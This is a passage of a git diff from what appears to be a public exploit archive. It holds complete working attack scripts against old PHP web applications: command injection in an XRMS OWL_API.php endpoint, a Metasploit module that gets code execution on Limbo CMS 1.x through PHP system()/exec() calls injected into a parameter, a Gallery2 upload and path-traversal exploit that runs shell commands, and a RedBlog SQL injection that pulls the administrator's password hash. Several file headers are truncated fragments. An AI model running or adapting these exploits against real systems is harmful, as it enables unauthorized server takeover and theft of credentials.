+  or die "[+] Connecting ... Could not connect to host.\n\n";
+  print $sock "GET ".$path."lib/OWL_API.php?cmd=".$cmd."&xrms_file_root=".$loc." HTTP/1.1\r\n";
+  print $sock "User-Agent: Y!TunnelPro\r\n";
+  print $sock "Host: ".$serv."\r\n";
+  print $sock "Connection: close\r\n\r\n";
+
+  while ($answer = <$sock>) {
+    print $answer;
+  }
+  close($sock);
+
+# milw0rm.com [2006-03-07]
diff --git a/platforms/php/webapps/1563.pm b/platforms/php/webapps/1563.pm
index 64c8ca70c..2df9166aa 100755
--- a/platforms/php/webapps/1563.pm
+++ b/platforms/php/webapps/1563.pm
@@ -1,169 +1,169 @@
-##
-#      Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability. 
-#    Name: limbo_cms_1_x.pm
-# License: Artistic/BSD/GPL
-#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
-#
-#
-#  - This is an exploit module for the Metasploit Framework, please see
-#     http://metasploit.com/projects/Framework for more information.
-##
-
-package Msf::Exploit::limbo_cms_1_x;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-use bytes;
-
-my $advanced = { };
-
-my $info = {
-	'Name'     => 'Limbo CMS version 1.x Code Execution',
-	'Version'  => '$Revision: 1.1 $',
-	'Authors'  => [ 'sirh0t < sirh0t [at] hotmail.com >' ],
-	'Arch'     => [ ],
-	'OS'       => [ ],
-	'Priv'     => 0,
-	'UserOpts' =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-		'RPATH' => [1, 'DATA', 'Path to the index.php script', ' /limbo/index.php'],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-
-	'Description' => Pex::Text::Freeform(qq{
-			This module exploits an arbitrary PHP code execution flaw in the Limbo version 1.*. All versions UNPATCHED Limbo 1.x are affected. Bug found by Aleksander Hristov
-}),
-#milw0rm this is your part ;p
-	'Refs' =>
-	  [
-		['OSVDB', '-----'],
-		['CVE',   '---------'],
-		['MIL',   '125'],
-	  ],
-
-	'Payload' =>
-	  {
-		'Space' => 512,
-		'Keys'     => ['cmd', 'cmd_bash'],
-	  },
-
-	'DefaultTarget' => 1,
-	'Targets' =>
-	  [
-		['Vulnerably test',0],
-		['use system()', 1],
-		['use exec()', 2],
-		['use shell_exec()',3],
-		['use passthru()',4],
-	  ],
-
-
-	'Keys' => ['limbo'],
-
-	'DisclosureDate' => 'Mar 03 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host    = $self->GetVar('RHOST');
-	my $vhost          = $self->GetVar('VHOST') || $target_host;
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $target      = $self->Targets->[$target_idx];
-	my $path           = $self->GetVar('RPATH');
-	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
-	my ($data);
-
-	# Add an echo on each end for easy output capturing
-	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
-
-	# Replacing all spaces with %20
-	$cmd =~ s/ /%20/g;
-
-	# Create the get request data
-	if ($target_idx == 0) {
-		$data = "?option=frontpage&Itemid=phpinfo()";
-	} elsif($target_idx == 1) {
-		$data = "?option=frontpage&Itemid=system(\$_GET[m])&m=$cmd";
-	} elsif($target_idx == 2) {
-		$data = "?option=frontpage&Itemid=exec(\$_GET[m])&m=$cmd";
-	} elsif($target_idx == 3) {
-		$data = "?option=frontpage&Itemid=shell_exec(\$_GET[m])&m=$cmd";
-	} elsif($target_idx == 4) {
-		$data = "?option=frontpage&Itemid=passthru(\$_GET[m])&m=$cmd";
-	}
-
-	my $req =
-	  "GET $path$data HTTP/1.1\r\n".
-	  "Accept: */*\r\n".
-	  "User-Agent: Mozilla/4.0 (MetaSploit)\r\n".
-	  "Host: $vhost\r\n".
-	  "Connection: Close\r\n".
-	  "\r\n";
-
-	my $s = Msf::Socket::Tcp->new(
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-
-	if ($s->IsError){
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$self->PrintLine("[*] Sending the malicious Limbo request...");
-
-	$s->Send($req);
-	my $results = $s->Recv(-1, 20);
-	$s->Close();
-
-	if ($target_idx == 0) {
-	if ($results =~ /disable_functions/) {
-		$self->PrintLine("[*] Server is vuln!");
-		if ($results =~ /system()/) {
-			$self->PrintLine("[?] system() is disabled");
-		}
-		if ($results =~ /shell_exec()/) {
-			$self->PrintLine("[?] shell_exec() is disabled");
-		}
-		if ($results =~ /passthru()/) {
-			$self->PrintLine("[?] shell_exec() is disabled");
-		}
-		if ($results =~ /exec()/) {
-			$self->PrintLine("[?] exec() is disabled");
-		}
-			$self->PrintLine("[*] If safe_mode=on try $vhost$path?option=frontpage&Itemid=include(\$_GET[m])&m=http://PHPSHELL?&");
-
-	} else {
-	 	$self->PrintLine("[-] Server NOT vuln!");
-	} 
-	} elsif ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
-		my $out = $1;
-		$out =~ s/^\s+|\s+$//gs;
-		if ($out) {
-			$self->PrintLine('----------------------------------------');
-			$self->PrintLine('');
-			$self->PrintLine($out);
-			$self->PrintLine('');
-			$self->PrintLine('----------------------------------------');
-		}
-	} else {
-		$self->PrintLine('[-] exploit failed');
-	}
-
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-03-07]
+##
+#      Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability. 
+#    Name: limbo_cms_1_x.pm
+# License: Artistic/BSD/GPL
+#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
+#
+#
+#  - This is an exploit module for the Metasploit Framework, please see
+#     http://metasploit.com/projects/Framework for more information.
+##
+
+package Msf::Exploit::limbo_cms_1_x;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+use bytes;
+
+my $advanced = { };
+
+my $info = {
+	'Name'     => 'Limbo CMS version 1.x Code Execution',
+	'Version'  => '$Revision: 1.1 $',
+	'Authors'  => [ 'sirh0t < sirh0t [at] hotmail.com >' ],
+	'Arch'     => [ ],
+	'OS'       => [ ],
+	'Priv'     => 0,
+	'UserOpts' =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
+		'RPORT' => [1, 'PORT', 'The target port', 80],
+		'RPATH' => [1, 'DATA', 'Path to the index.php script', ' /limbo/index.php'],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+
+	'Description' => Pex::Text::Freeform(qq{
+			This module exploits an arbitrary PHP code execution flaw in the Limbo version 1.*. All versions UNPATCHED Limbo 1.x are affected. Bug found by Aleksander Hristov
+}),
+#milw0rm this is your part ;p
+	'Refs' =>
+	  [
+		['OSVDB', '-----'],
+		['CVE',   '---------'],
+		['MIL',   '125'],
+	  ],
+
+	'Payload' =>
+	  {
+		'Space' => 512,
+		'Keys'     => ['cmd', 'cmd_bash'],
+	  },
+
+	'DefaultTarget' => 1,
+	'Targets' =>
+	  [
+		['Vulnerably test',0],
+		['use system()', 1],
+		['use exec()', 2],
+		['use shell_exec()',3],
+		['use passthru()',4],
+	  ],
+
+
+	'Keys' => ['limbo'],
+
+	'DisclosureDate' => 'Mar 03 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host    = $self->GetVar('RHOST');
+	my $vhost          = $self->GetVar('VHOST') || $target_host;
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $target      = $self->Targets->[$target_idx];
+	my $path           = $self->GetVar('RPATH');
+	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
+	my ($data);
+
+	# Add an echo on each end for easy output capturing
+	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
+
+	# Replacing all spaces with %20
+	$cmd =~ s/ /%20/g;
+
+	# Create the get request data
+	if ($target_idx == 0) {
+		$data = "?option=frontpage&Itemid=phpinfo()";
+	} elsif($target_idx == 1) {
+		$data = "?option=frontpage&Itemid=system(\$_GET[m])&m=$cmd";
+	} elsif($target_idx == 2) {
+		$data = "?option=frontpage&Itemid=exec(\$_GET[m])&m=$cmd";
+	} elsif($target_idx == 3) {
+		$data = "?option=frontpage&Itemid=shell_exec(\$_GET[m])&m=$cmd";
+	} elsif($target_idx == 4) {
+		$data = "?option=frontpage&Itemid=passthru(\$_GET[m])&m=$cmd";
+	}
+
+	my $req =
+	  "GET $path$data HTTP/1.1\r\n".
+	  "Accept: */*\r\n".
+	  "User-Agent: Mozilla/4.0 (MetaSploit)\r\n".
+	  "Host: $vhost\r\n".
+	  "Connection: Close\r\n".
+	  "\r\n";
+
+	my $s = Msf::Socket::Tcp->new(
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+
+	if ($s->IsError){
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$self->PrintLine("[*] Sending the malicious Limbo request...");
+
+	$s->Send($req);
+	my $results = $s->Recv(-1, 20);
+	$s->Close();
+
+	if ($target_idx == 0) {
+	if ($results =~ /disable_functions/) {
+		$self->PrintLine("[*] Server is vuln!");
+		if ($results =~ /system()/) {
+			$self->PrintLine("[?] system() is disabled");
+		}
+		if ($results =~ /shell_exec()/) {
+			$self->PrintLine("[?] shell_exec() is disabled");
+		}
+		if ($results =~ /passthru()/) {
+			$self->PrintLine("[?] shell_exec() is disabled");
+		}
+		if ($results =~ /exec()/) {
+			$self->PrintLine("[?] exec() is disabled");
+		}
+			$self->PrintLine("[*] If safe_mode=on try $vhost$path?option=frontpage&Itemid=include(\$_GET[m])&m=http://PHPSHELL?&");
+
+	} else {
+	 	$self->PrintLine("[-] Server NOT vuln!");
+	} 
+	} elsif ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
+		my $out = $1;
+		$out =~ s/^\s+|\s+$//gs;
+		if ($out) {
+			$self->PrintLine('----------------------------------------');
+			$self->PrintLine('');
+			$self->PrintLine($out);
+			$self->PrintLine('');
+			$self->PrintLine('----------------------------------------');
+		}
+	} else {
+		$self->PrintLine('[-] exploit failed');
+	}
+
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-03-07]
diff --git a/platforms/php/webapps/1566.php b/platforms/php/webapps/1566.php
index 137bf9a75..9ea8f6e2a 100755
--- a/platforms/php/webapps/1566.php
+++ b/platforms/php/webapps/1566.php
@@ -1,204 +1,204 @@
-#!/usr/bin/php -q -d short_open_tag=on
-autisticiorg                                     \r\n";
-echo "site: http://retrogod.altervista.org                              \r\n\r\n";
-echo "-> works with register_globals = On and magic_quotes_gpc = Off        \r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS              \r\n";
-echo "host:      target server (ip/hostname)                               \r\n";
-echo "path:      path to gallery2                                          \r\n";
-echo "user-pass: this exploit needs valid user credentials to upload a     \r\n";
-echo "           watermark                                                 \r\n";
-echo "cmd:       a shell command                                           \r\n";
-echo "Options:                                                             \r\n";
-echo "   -p[port]:    specify a port other than 80                         \r\n";
-echo "   -P[ip:port]: specify a proxy                                      \r\n";
-echo "Examples:                                                            \r\n";
-echo "php ".$argv[0]." localhost /gallery2/ user pass cat ./../config.php  \r\n";
-echo "php ".$argv[0]." localhost /gallery2/ user pass type .\..\config.php \r\n";
-echo "php ".$argv[0]." localhost /gallery2/ user pass -p81 -P1.1.1.1:80 ls -la\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  //debug
-  //echo "\r\n".$html;
-}
-
-$host=$argv[1];$path=$argv[2];$user=$argv[3];$pass=$argv[4];
-$cmd="";$port=80;$proxy="";
-
-for ($i=5; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-
-echo "STEP 1 -> Login...\r\n";
-$data ="g2_navId=xebb12f28";
-$data.="&g2_formUrl=http%3A%2F%2F".urlencode($host.$path)."main.php%3Fg2_view%3Dcore.UserAdmin%26g2_subView%3Dcore.UserLogin";
-$data.="&g2_controller=core.UserLogin";
-$data.="&g2_form%5BformName%5D=UserLogin";
-$data.="&g2_form%5Busername%5D=".$user;
-$data.="&g2_form%5Bpassword%5D=".$pass;
-$data.="&g2_form%5Baction%5D%5Blogin%5D=Login";
-$packet ="POST ".$p."main.php HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-//debug
-//echo quick_dump($packet);
-
-sendpacketii($packet);
-if (!eregi("Location:",$html)) {echo "Failed to login...";die;}
-                          else {echo "Login -> OK\r\n";}
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[1]);
-$COOKIE=$temp2[0];
-$temp2=explode(" ",$temp[2]);
-$COOKIE.=" ".str_replace(";","",$temp2[0]);
-echo "COOKIE ->".$COOKIE."\r\n";
-
-echo "STEP 2 -> Upload evil file...\r\n";
-$data="------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_returnName\"
-
-user watermarks
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_navId\"
-
-xebb12f28
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_formUrl\"
-
-http://".$host.$path."main.php?g2_view=core.UserAdmin&g2_subView=watermark.UserWatermarks
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_controller\"
-
-watermark.UserWatermarks
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_form[formName]\"
-
-UserWatermarks
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_form[1]\"; filename=\"SUNTZUUUUUUU\"
-Content-Type: text/plain
-
-
-------------2xqpvaUR5xYUMAC8KQGMSV
-Content-Disposition: form-data; name=\"g2_form[action][add]\"
-
-Add
-------------2xqpvaUR5xYUMAC8KQGMSV--
-";
-
-$packet="POST ".$p."main.php HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$COOKIE."\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=----------2xqpvaUR5xYUMAC8KQGMSV\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-//debug
-//echo quick_dump($packet);
-sendpacketii($packet);
-
-$two_in_one= array("upgrade","install");
-for ($i=0; $i<=count($two_in_one)-1;$i++)
-{
-$step=3+$i;
-echo "STEP ".$step." -> Launch commands through ".$two_in_one[$i]." scripts ...\r\n";
-$xpl=urlencode("../../g2data/plugins_data/modules/watermark/SUNTZUUUUUUU".chr(0x00));
-$packet="GET ".$p.$two_in_one[$i]."/index.php?CMD=".$cmd."&stepOrder[]=".$xpl." HTTP/1.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-//debug
-//echo quick_dump($packet);
-sendpacketii($packet);
-//debug
-//echo $html;
-if (eregi("\*#\*",$html)) {
-$out=explode("*#*",$html);
-echo $out[1];
-die ("Exploit succeeded...\r\n");
-}
-}
-# if you are here...
-echo "Exploit failed...\r\n";
-?>
-
-# milw0rm.com [2006-03-08]
+#!/usr/bin/php -q -d short_open_tag=on
+autisticiorg                                     \r\n";
+echo "site: http://retrogod.altervista.org                              \r\n\r\n";
+echo "-> works with register_globals = On and magic_quotes_gpc = Off        \r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS              \r\n";
+echo "host:      target server (ip/hostname)                               \r\n";
+echo "path:      path to gallery2                                          \r\n";
+echo "user-pass: this exploit needs valid user credentials to upload a     \r\n";
+echo "           watermark                                                 \r\n";
+echo "cmd:       a shell command                                           \r\n";
+echo "Options:                                                             \r\n";
+echo "   -p[port]:    specify a port other than 80                         \r\n";
+echo "   -P[ip:port]: specify a proxy                                      \r\n";
+echo "Examples:                                                            \r\n";
+echo "php ".$argv[0]." localhost /gallery2/ user pass cat ./../config.php  \r\n";
+echo "php ".$argv[0]." localhost /gallery2/ user pass type .\..\config.php \r\n";
+echo "php ".$argv[0]." localhost /gallery2/ user pass -p81 -P1.1.1.1:80 ls -la\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  //debug
+  //echo "\r\n".$html;
+}
+
+$host=$argv[1];$path=$argv[2];$user=$argv[3];$pass=$argv[4];
+$cmd="";$port=80;$proxy="";
+
+for ($i=5; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+echo "STEP 1 -> Login...\r\n";
+$data ="g2_navId=xebb12f28";
+$data.="&g2_formUrl=http%3A%2F%2F".urlencode($host.$path)."main.php%3Fg2_view%3Dcore.UserAdmin%26g2_subView%3Dcore.UserLogin";
+$data.="&g2_controller=core.UserLogin";
+$data.="&g2_form%5BformName%5D=UserLogin";
+$data.="&g2_form%5Busername%5D=".$user;
+$data.="&g2_form%5Bpassword%5D=".$pass;
+$data.="&g2_form%5Baction%5D%5Blogin%5D=Login";
+$packet ="POST ".$p."main.php HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+//debug
+//echo quick_dump($packet);
+
+sendpacketii($packet);
+if (!eregi("Location:",$html)) {echo "Failed to login...";die;}
+                          else {echo "Login -> OK\r\n";}
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[1]);
+$COOKIE=$temp2[0];
+$temp2=explode(" ",$temp[2]);
+$COOKIE.=" ".str_replace(";","",$temp2[0]);
+echo "COOKIE ->".$COOKIE."\r\n";
+
+echo "STEP 2 -> Upload evil file...\r\n";
+$data="------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_returnName\"
+
+user watermarks
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_navId\"
+
+xebb12f28
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_formUrl\"
+
+http://".$host.$path."main.php?g2_view=core.UserAdmin&g2_subView=watermark.UserWatermarks
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_controller\"
+
+watermark.UserWatermarks
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_form[formName]\"
+
+UserWatermarks
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_form[1]\"; filename=\"SUNTZUUUUUUU\"
+Content-Type: text/plain
+
+
+------------2xqpvaUR5xYUMAC8KQGMSV
+Content-Disposition: form-data; name=\"g2_form[action][add]\"
+
+Add
+------------2xqpvaUR5xYUMAC8KQGMSV--
+";
+
+$packet="POST ".$p."main.php HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; it) Opera 8.50\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$COOKIE."\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=----------2xqpvaUR5xYUMAC8KQGMSV\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+
+$two_in_one= array("upgrade","install");
+for ($i=0; $i<=count($two_in_one)-1;$i++)
+{
+$step=3+$i;
+echo "STEP ".$step." -> Launch commands through ".$two_in_one[$i]." scripts ...\r\n";
+$xpl=urlencode("../../g2data/plugins_data/modules/watermark/SUNTZUUUUUUU".chr(0x00));
+$packet="GET ".$p.$two_in_one[$i]."/index.php?CMD=".$cmd."&stepOrder[]=".$xpl." HTTP/1.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//debug
+//echo quick_dump($packet);
+sendpacketii($packet);
+//debug
+//echo $html;
+if (eregi("\*#\*",$html)) {
+$out=explode("*#*",$html);
+echo $out[1];
+die ("Exploit succeeded...\r\n");
+}
+}
+# if you are here...
+echo "Exploit failed...\r\n";
+?>
+
+# milw0rm.com [2006-03-08]
diff --git a/platforms/php/webapps/1567.php b/platforms/php/webapps/1567.php
index 4ddfdd468..0da0b9511 100755
--- a/platforms/php/webapps/1567.php
+++ b/platforms/php/webapps/1567.php
@@ -1,79 +1,79 @@
- x128.net                    oo website : www.x128.net";
-}
-
-function xss_exploit()
-{
-    $xss_target = $_SERVER['argv'][1] . "/modules/blog/rss.php";
-    $xss_http_get = "?cat_id=x128";
-
-    $xss_connection = curl_init();
-
-    if ($_SERVER['argv'][2])
-    {
-        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
-        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][2]);
-    }
-
-    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
-    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
-    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
-    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');
-
-    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
-    
-    preg_match("/FROM ([0-9a-zA-Z_]*)posts/", $xss_source, $xss_prefix);
-
-    $xss_http_get = "?cat_id=" . urlencode("0 UNION SELECT 1,config_value,1,1,1,1,1,1 FROM " . $xss_prefix[1] . "general_config/*");
-    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
-
-    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
-
-    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
-    preg_match("/([0-9a-f]{32})<\/title>/", $xss_source, $xss_output);
-    
-    if ($xss_output[0])
-    {
-        echo "oo password       " . $xss_output[1] . "\n\n";
-        echo "oo dafaced ...\n";
-    }
-
-    curl_close ($xss_connection); 
-}
-
-xss_init();
-xss_header();
-xss_exploit();
-xss_bottom();
-?>
-
-# milw0rm.com [2006-03-08]
+<?
+error_reporting(E_ERROR);
+
+function xss_init()
+{
+    if (!extension_loaded('php_curl'))
+    {
+       if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
+       die ("oo error - cannot load curl extension!");
+    }
+}
+
+function xss_header()
+{
+    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
+    echo "                                  oo    ooooooo     ooooooo\n";
+    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
+    echo "                      888o888    888        o888   888888888\n";
+    echo "                      o88888o    888     o888   o 888o   o888\n";
+    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
+    echo "ooooooooooooooooooooooooooooo redblog 0.5 exploit ooooooooooooooooooooooooooooo\n";
+    echo "oo usage          $ php redblog-05-exploit.php [url]\n";
+    echo "oo proxy support  $ php redblog-05-exploit.php [url] [proxy]:[port]\n";
+    echo "oo example        $ php redblog-05-exploit.php http://localhost\n";
+    echo "oo print the password of the administrator\n\n";
+}
+
+function xss_bottom()
+{
+    echo "\noo discover : x128 - alexander wilhelm - 09/03/2006\n";
+    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net";
+}
+
+function xss_exploit()
+{
+    $xss_target = $_SERVER['argv'][1] . "/modules/blog/rss.php";
+    $xss_http_get = "?cat_id=x128";
+
+    $xss_connection = curl_init();
+
+    if ($_SERVER['argv'][2])
+    {
+        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
+        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][2]);
+    }
+
+    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
+    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
+    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');
+
+    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
+    
+    preg_match("/FROM ([0-9a-zA-Z_]*)posts/", $xss_source, $xss_prefix);
+
+    $xss_http_get = "?cat_id=" . urlencode("0 UNION SELECT 1,config_value,1,1,1,1,1,1 FROM " . $xss_prefix[1] . "general_config/*");
+    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
+
